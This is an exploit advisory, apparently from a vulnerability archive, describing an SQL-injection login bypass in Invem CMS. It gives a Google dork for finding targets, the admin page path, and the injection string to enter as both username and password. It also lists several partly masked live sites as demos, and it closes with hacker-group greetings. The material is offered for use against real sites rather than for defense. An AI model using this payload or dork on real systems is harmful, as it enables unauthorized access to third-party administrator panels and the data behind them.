Invem CMS Admin Bypass Vulnerability

2015.01.20
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:Powered by INVEM

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+]Exploit Title : Invem CMS Admin Bypass Vulnerability [+] [+]Exploit Author : Ashiyane Digital Security Team [+] [+]Vendor Homepage: http://www.invem.com/ [+] [+]Google Dork : intext:Powered by INVEM. [+] [+]Date : 20 / Jan / 2015 [+] [+]Tested On : windows se7en + linux Kali + Google Chrome + Mozilla [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] After You Go In Admin Page Enter UserName & Password And Username And Password Is : [+] [+] UserName : '=' 'or' [+] Password : '=' 'or' [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> Location <~ ~ ~ [+] [+] http://Target.com/administrator/default.php [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> DEMO <~ ~ ~ [+] [+] http://www.onemXart.cc/administrator/default.php [+] [+] http://www.jcptXdc.com/administrator/default.php [+] [+] http://www.plXXroup.cn/administrator/default.php [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+]..:: Parcham Balast :: :: Parcham Balast :: :: Parcham Balast :: :: Parcham Balast ::.. [+] [+] Discovered by : SeRaVo.BlackHat [+] Hassan [+] [+] [+] ~ General.BlackHat@Gmail.com ~ https://www.facebook.com/general.blackhat [+] [+] ~ Unitazad@YaHoo.com ~ https://twitter.com/strip_ssl [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] MY FRIEND'Z : Unhex.coder + #N3T + Lupin 13 + AMOK + Milad.Hacking + 3cure BlackHat + Dr.3vil [+] Mr.Time + SHD.N3T + MR.M@j!D + eb051 + RAMIN + ACC3SS + X3UR + 4li.BlackHat + IraQeN-H4XORZ [+] Dj.TiniVini + NoL1m1t + l4tr0d3ctism + r3d_s0urc3 + 0x0ptim0us + E1.Coders + MR.F@RDIN [+] 0xTiger + C4T + Predator + S!Y0U.T4r.6T + soheil.hidd3n + Soldier + Spoofer + Cyb3r_Dr4in [+] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + G3N3Rall + Mr.XHat [+] [+] And All Iranian Cyber Army ...\. [+] Home : Ashiyane.org/Forum [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top